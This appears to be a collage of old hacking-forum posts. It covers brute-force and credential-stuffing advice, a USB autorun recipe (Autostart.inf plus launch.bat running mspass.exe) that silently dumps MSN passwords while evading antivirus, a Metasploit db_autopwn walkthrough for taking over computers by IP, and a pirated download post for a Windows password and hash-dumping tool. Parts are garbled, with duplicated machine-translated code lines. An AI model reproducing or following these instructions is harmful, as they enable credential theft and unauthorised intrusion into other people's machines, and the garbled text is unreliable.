INTERMEZZO: "What to do with the usernames?"
This is a question I get a lot. Someone has seen the stats, and now has a list of usernames. Now what? Well, half the battle is won! Remember the statement I made about increasing your chances in getting access? This is it! Proceed in two ways:
1. Use the usernames and one of your wordlists to do a BF attack
2. Match the usernames to working combos you have. There are tools for this, and try to see if the combos work. Many users use the same password for different sites...see where I am getting at?

4. GOOGLE, GOOGLE, GOOGLE!
I love google. I embrace googling. You should too. Make googling your hobby! Type in a path or exploit, and see what you get, you will be surprised! It will lead you to access logs, vulnerability reports, cool sites, etc. Whatever you find and think is useful, copy to your exploit list...

Get The Msn Password From Usb Stick

the first thing you need is an U3 USB-Stick. ( this are usb sticks which support the autostart function )

--- then you download mspass here click me

--- You open your USB stick and make a new text document which is called Autostart. this is what you write into this file:
---------------------------------
[Autostart]
open=launch.bat
ACTION = myusbstick
---------------------------------
( After writing this you have to save the file as "Autostart.inf", "myusbstick" is of course the name of your usb stick :D )

--- Then you make a folder called mspass, in this folder you copy the downloaded mspass.exe

--- Then you make a .bat file which is named launch.bat
in this file you write
---------------------------------
start mspass\mspass.exe /stext mspass.txt
---------------------------------


oke this is all you have to do. the trick with the folder and the launch.bat is, that the antivirus programs don't detect them so fast.
when everything is ok, it should work like that:

you put the usb stick into any computer, the autostart.inf will launch the mspass. After a few seconds you can remove the usb stick, and there will be a new .txt file in which the msn password is written.

Enjoy hacking,

Learn Basic JavaScript Hacking: How to Hack with Java Script

LEVEL 1
You must first obtain the "source code": Set the security of Internet Explorer to high, click on the link to level 1 at the very top of the menu bar, Internet Explorer, the File, Edit, View, etc. Press the "View", "Source".This will take it up a Notepad window. Look for:

passwort=prompt("Please enter password!","") passwort = prompt ( "Please enter password !","")

This ensures a prompt box you can write in, that you enter as a password is stored in the variable "passwort".

if (passwort=="easy") if (passwort == "easy")

This checks on "passwort" (what you type) is "easy", the password for level 1 is when the "easy".

Set back security to medium and click on the link to the Level 1and type "easy".

Use the same procedure to obtain the "source code".

LEVEL 2
Once you have retrieved the Notepad window, there will be a lot of code. Just scroll further down, find this:

var m1, i; was m1, i;
m1="JavaScript"; m1 = "JavaScript";
value=prompt("Please enter password!",""); value = prompt ( "Please enter password !","");
if (value==m1) { if (value == m1) (
window.location=value+".htm"; window.location = value + ". htm";
i=4; i = 4;

What you type being stored in the variable "value",

if (value==m1) if (value == m1)

"m1" is a variable that contains a value. See further up:

m1="JavaScript " m1 = "JavaScript"
The password is "JavaScript".

Hack Any Computer With An ip [MetaSploit]

Hello everybody! I am here to show you this magical tool called Metasploit that allows you to hack ANYunpatched computer with only it's IP. Lets begin...

1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

2.) You need PostgrSQL for your database. Download here: http://www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work!

3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...



4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:



5.)Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't wory, this is normal.

6.)Type db_host to make sure you are connected correctally.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

7.) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...

8.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

9.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber

___________________________________________________________

The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.

Reset Windows Password Advanced Edition v1.2.1.195 Retail

Lost password or locked Windows account is the most frequent problem data recovery specialists have to deal with. You could format the hard drive or reinstall your operating system, but that wouldn't keep you from partial loss of data, personal settings and extra headache. Besides, all that can take some time. There is a quicker and more elegant way out of this situation. Just run Reset Windows Passwords from a bootable CD or USB and reset the forgotten password or unlock the account. It's a matter of a few minutes! Reset Windows Password is the most powerful solution for recovering or resetting all types of Windows account passwords: user', administrator, Active Directory accounts, and domain administrators.
The program is designed specifically for an inexperienced user and is easy to operate. On the other hand, the password lookup algorithms are unique and not used in any similar application.
Unlike other utilities, Reset Windows Password is the only program that can CORRECTLY process all types of Windows accounts.

Features
Simple, intuitive graphic interface. No more ugly DOS prompts.
Resets and modifies passwords of local users and administrators, domain administrator, Active Directory users, DSRM account.
Enables and unlocks user accounts.
Disables the password expiry option.
Resets SYSKEY (with full user passwords re-encryption)
Advanced password lookup algorithms (also known as AI attack).
Dumps user password hashes from SAM for further analysis.
Dumps password hashes from Active Directory.
Dumps domain cached credentials.
Supports all versions of NT-based Windows, including the newest Windows 7.
All editions include the utility for creating a bootable CD/DVD/USB disk from the downloadable ISO file with the application.
Supports 64-bit Windows.
Large collection of IDE, SATA, SCSI, RAID drivers.
Detects several operating systems installed on the computer.
Supports non-English versions of Windows and passwords in national encodings.
Allows undoing changes made to the system.
Deletes passwords and other sensitive data from the computer.
Detailed help.

How it looks and works
Reset Windows Password - screenshots and documentation
Full list of the program features
Three simple steps to create a bootable CD, DVD or USB disk
Utility for creating bootable disks
Running RWP from the bootable disk
Modifying BIOS to boot from RWP disk, questions and answers

The software is available in three editions: Light, Standard and Advanced. The detailed list of features is shown below : www.passcape.com/reset_windows_password_editions Reset.Windows.Password.Advanced.Edition.v1.2.1.195.retail-iOTA

Download : | FileSonic | DepositFiles | Turbobit |